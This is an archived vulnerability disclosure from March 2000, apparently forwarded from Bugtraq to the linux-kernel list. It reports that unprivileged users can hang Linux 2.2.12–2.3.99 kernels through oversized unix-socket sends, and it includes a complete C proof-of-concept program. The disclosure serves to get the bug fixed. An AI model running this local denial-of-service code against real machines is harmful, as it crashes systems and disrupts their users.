----- Original Message -----
From: Jay Fenlason <fenlason@CLEARWAY.COM>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Thursday, March 23, 2000 11:55 PM
Subject: Local Denial-of-Service attack against Linux
> This amusing little program will hang Linux 2.2.12 (default Red Hat 6.1),
> 2.2.14 (latest stable kernel) and 2.3.99-pre2 (latest development kernel)
> on my 6x86 scratch machine and our various Pentium development machines.
> Note that this does not require any special privileges.
>
> The send system call immediately puts the kernel in a loop spewing
> kmalloc: Size (131076) too large
> forever (or until you hit the reset button).
>
> Apparently unix domain sockets are ignoring the
/proc/sys/net/core/wmem_max
> parameter, despite the documentation to the contrary. The fix should be
> simple, but I haven't had time to chase it down, and I'm not (usually) a
> Linux kernel developer.
>
> -- JF
>
> --- BEGIN INCLUDED SOURCE FILE ---
>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <string.h>
>
> char buf[128 * 1024];
>
> int main ( int argc, char **argv )
> {
> struct sockaddr SyslogAddr;
> int LogFile;
> int bufsize = sizeof(buf)-5;
> int i;
>
> for ( i = 0; i < bufsize; i++ )
> buf[i] = ' '+(i%95);
> buf[i] = '\0';
>
> SyslogAddr.sa_family = AF_UNIX;
> strncpy ( SyslogAddr.sa_data, "/dev/log",
sizeof(SyslogAddr.sa_data) );
> LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
> sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
> return 0;
> }
> --- END INCLUDED SOURCE FILE ---
>
-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/
This archive was generated by hypermail 2b29 : Fri Mar 24 2000 - 10:06:10 EST